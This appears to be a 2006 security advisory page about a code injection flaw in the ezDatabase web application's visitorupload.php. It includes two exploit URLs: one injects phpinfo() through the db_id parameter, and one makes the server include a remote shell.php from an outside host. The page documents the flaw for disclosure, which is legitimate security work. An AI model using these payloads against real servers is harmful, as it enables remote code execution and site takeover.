ezDatabase 2.0 and below

2006.01.14
Credit: Pridels Team
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

ezDatabase 2.0 and below ezDatabase 2.0 and below ========================================= www.ezdatabase.org "ezDatabase is the foundation for your online databases. It is a powerful web based application that allows even non-technical users to create online databases for their website. ezDatabase will do the hard work while you concentrate on building the databases you want." ______________________________________________ This vulnerability was first disclosed at: www.unsecured-systems.com/forum/ By Pridels Team: pridels.blogspot.com ______________________________________________ Details: This application insecurely uses variables in several ways. Example: visitorupload.php?db_id=;phpinfo() visitorupload.php?db_id=;include(_GET[test])&test=http://www.unsecured-s ystems.com/forum/shell.php registered_globals = on OR off Solution: Rewrite the application to follow the guidelines of the PHP Security Consortium At this time there are several more vulnerabilites that have only been disclosed at: www.unsecured-systems.com/forum/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top